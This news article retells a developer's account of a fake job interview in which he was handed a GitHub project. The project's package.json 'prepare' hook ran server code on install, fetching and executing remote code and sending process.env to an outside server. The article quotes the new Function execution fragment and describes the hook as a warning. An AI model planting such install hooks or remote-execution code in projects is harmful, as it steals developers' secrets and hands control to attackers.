Senior Software Developer Mykyta Kurochka shared an experience on LinkedIn that could have turned into a cybercrime. According to him, he almost became a victim of fraud during an interview for a position at Cryptan Labs.
Senior Software Developer Mykyta Kurochka shared an experience on LinkedIn that could have turned into a cybercrime. According to him, he almost became a victim of fraud during an interview for a position at Cryptan Labs.
According to Nikita, at first glance, the vacancy and the role description looked quite ordinary. During the video interview, the interviewer asked to turn off the camera, allegedly due to internet problems. Later, the IT specialist realized that it could be an AI-generated avatar, not a real person.
During the interview, he was shown the design in Figma and told about the basic functionality, deadlines and scope of work. However, a number of points should have raised concerns. «The project is supposedly new and launched only 2-3 weeks ago. I was asked to review the code and give feedback. I was added to the GitHub organization. I uploaded the project as an archive, not via SSH,» the developer said .
«I made it clear that I wouldn’t launch the project until I fully understood what it was doing. They told me that was fine. The project was almost empty in terms of logic, but had a large structure where the frontend and backend were in the same repository,» the developer noted.
After checking package.json, Nikita noticed that when installing dependencies, the project was automatically launched via "prepare": "node server/server.js". Upon detailed analysis, he found code that allowed remote execution of arbitrary commands and sent all environment variables (process.env) to a third-party server, which is a serious security threat.
«When I asked why anything was being run at all, I was told that it was «part of the process.» After that, I was repeatedly asked to run the project anyway. After several refusals, the conversation ended very quickly. Several dangerous places were found. In particular, the code that allowed arbitrary code to be executed remotely: const executor = new Function («require», response.data);
executor (requires);
There was also code that sent the entire process.env outside. When I later started to understand, the server response was JSON with my IP address. This in itself is not critical, but the mechanism itself is extremely dangerous.
«If this post helps someone to be more careful, then it was written for a reason,» says Mykyta.
The developer advises never to run unfamiliar code without fully understanding its operation. «Close all ports and update SSH keys after suspicious actions; check the code for potentially dangerous areas, for example, using AI tools; be careful with new GitHub organizations and uploading projects to the local environment,» the IT expert advises.
Mykyta emphasizes that his experience can serve as a warning to others: «If this post helps someone to be more careful, then it was not written in vain.»
